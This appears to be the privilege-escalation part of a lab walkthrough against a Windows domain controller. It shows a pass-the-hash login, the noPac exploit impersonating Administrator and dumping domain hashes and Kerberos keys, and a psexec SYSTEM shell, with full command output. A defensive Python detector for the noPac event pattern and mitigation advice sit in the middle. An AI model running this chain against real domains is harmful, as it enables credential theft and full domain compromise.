Priv Esc

$ netexec smb 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 -M nopac
SMB         192.168.170.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB         192.168.170.175 445    RESOURCEDC       [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 
NOPAC       192.168.170.175 445    RESOURCEDC       TGT with PAC size 1450
NOPAC       192.168.170.175 445    RESOURCEDC       TGT without PAC size 653
NOPAC       192.168.170.175 445    RESOURCEDC       
NOPAC       192.168.170.175 445    RESOURCEDC       VULNERABLE
NOPAC       192.168.170.175 445    RESOURCEDC       Next step: https://github.com/Ridter/noPac
$ echo 192.168.170.175 RESOURCEDC resourced.local RESOURCEDC.resourced.local | sudo tee -a /etc/hosts
192.168.170.175 RESOURCEDC resourced.local RESOURCEDC.resourced.local
$ python noPac.py resourced.local/L.Livingstone -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip 192.168.170.175 -dc-host RESOURCEDC --impersonate Administrator -dump -just-dc-user Administrator -use-ldap

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target RESOURCEDC.resourced.local
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-LKSXTEHHJQ3$"
[*] MachineAccount "WIN-LKSXTEHHJQ3$" password = FuKyJY@u0fZW
[*] Successfully added machine account WIN-LKSXTEHHJQ3$ with password FuKyJY@u0fZW.
[*] WIN-LKSXTEHHJQ3$ object = CN=WIN-LKSXTEHHJQ3,CN=Computers,DC=resourced,DC=local
[*] WIN-LKSXTEHHJQ3$ sAMAccountName == RESOURCEDC
[*] Saving a DC's ticket in RESOURCEDC.ccache
[*] Reseting the machine account to WIN-LKSXTEHHJQ3$
[*] Restored WIN-LKSXTEHHJQ3$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_RESOURCEDC.resourced.local.ccache
[*] Attempting to del a computer with the name: WIN-LKSXTEHHJQ3$
[-] Delete computer WIN-LKSXTEHHJQ3$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5
Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3
Administrator:des-cbc-md5:0de34cf7bf32898f
[*] Cleaning up... 
Administrator:8e0efd059433841f73d171c69afdda7c
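A defender-side check for the trail the noPac run above leaves in the domain (a computer account created under the ms-DS-MachineAccountQuota allowance, its sAMAccountName renamed to the DC's name without the trailing "$", then restored). This is an added example, not code from noPac or from the box author; it assumes Windows Security events 4741 (computer account created) and 4781 (account name changed) have already been parsed into dictionaries, and the event records in it are constructed to mirror the run above, not real telemetry. The rules generalize past this one box: any "$"-suffixed account renamed to a suffix-less name is flagged, and a collision with a DC hostname raises the severity.

```python
from datetime import datetime, timedelta

# Constructed sample of parsed Windows Security events (not real telemetry);
# they mirror the sequence of the noPac run on this page. Event IDs:
# 4741 = computer account created, 4781 = account name changed.
SAMPLE_EVENTS = [
    {"ts": "2024-08-07T10:00:01", "id": 4741,
     "subject": "RESOURCED\\L.Livingstone", "target": "WIN-LKSXTEHHJQ3$"},
    {"ts": "2024-08-07T10:00:02", "id": 4781,
     "subject": "RESOURCED\\L.Livingstone",
     "old_name": "WIN-LKSXTEHHJQ3$", "new_name": "RESOURCEDC"},
    {"ts": "2024-08-07T10:00:05", "id": 4781,
     "subject": "RESOURCED\\L.Livingstone",
     "old_name": "RESOURCEDC", "new_name": "WIN-LKSXTEHHJQ3$"},
    # Benign control: an administrator renames a workstation to another
    # workstation name; the "$" suffix is kept on both sides.
    {"ts": "2024-08-07T11:30:00", "id": 4781,
     "subject": "RESOURCED\\Administrator",
     "old_name": "OLD-PC$", "new_name": "NEW-PC$"},
]

# Hostnames of the domain controllers (assumed inventory; RESOURCEDC is the
# DC shown on this page).
DOMAIN_CONTROLLERS = {"RESOURCEDC"}


def detect_nopac_pattern(events, dc_names, window=timedelta(minutes=10)):
    """Return findings as (severity, rule, account, detail) tuples.

    Rule 1: a computer account (name ending in "$") is renamed to a name
            without the suffix; severity is "high" when that name equals a
            DC hostname, which is the collision noPac relies on.
    Rule 2: the renamed account was created less than `window` earlier by
            the same principal, i.e. a freshly added machine account being
            reshaped rather than an administrator tidying an old one.
    """
    dcs = {name.upper().rstrip("$") for name in dc_names}
    created = {}  # account name (upper) -> (creation time, creating subject)
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["id"] == 4741:
            created[ev["target"].upper()] = (ts, ev["subject"])
            continue
        if ev["id"] != 4781:
            continue
        old, new, who = ev["old_name"], ev["new_name"], ev["subject"]
        if old.endswith("$") and not new.endswith("$"):
            severity = "high" if new.upper() in dcs else "medium"
            findings.append((severity, "computer-renamed-without-$", old,
                             f"{old} -> {new} by {who}"))
        origin = created.get(old.upper())
        if origin and origin[1] == who and ts - origin[0] <= window:
            age = int((ts - origin[0]).total_seconds())
            findings.append(("medium", "create-then-rename", old,
                             f"{old} created by {who} {age}s before rename"))
    return findings


if __name__ == "__main__":
    for severity, rule, account, detail in detect_nopac_pattern(
            SAMPLE_EVENTS, DOMAIN_CONTROLLERS):
        print(f"[{severity}] {rule}: {detail}")
```

Rule 1 alone catches the name collision with a DC; rule 2 ties the rename to an account the same non-privileged principal created moments earlier, which is exactly what a MachineAccountQuota of 10 lets any domain user do. Setting ms-DS-MachineAccountQuota to 0 and applying the Windows updates that enforce PAC validation remove the preconditions this detector watches for; the check is still worth keeping for the window between a new DC being promoted and its patch level being confirmed.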
$ netexec smb 192.168.170.175 -u Administrator -H 8e0efd059433841f73d171c69afdda7c         
SMB         192.168.170.175 445    RESOURCEDC       [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB         192.168.170.175 445    RESOURCEDC       [+] resourced.local\Administrator:8e0efd059433841f73d171c69afdda7c (Pwn3d!)
$ impacket-psexec resourced.local/Administrator@192.168.170.175 -hashes :8e0efd059433841f73d171c69afdda7c
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra

[*] Requesting shares on 192.168.170.175.....
[*] Found writable share ADMIN$
[*] Uploading file oWGowvHH.exe
[*] Opening SVCManager on 192.168.170.175.....
[*] Creating service RERK on 192.168.170.175.....
[*] Starting service RERK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
ResourceDC
nt authority\system
54564fec8409f1ef939bc1292ab5192d

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.170.175
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.170.254
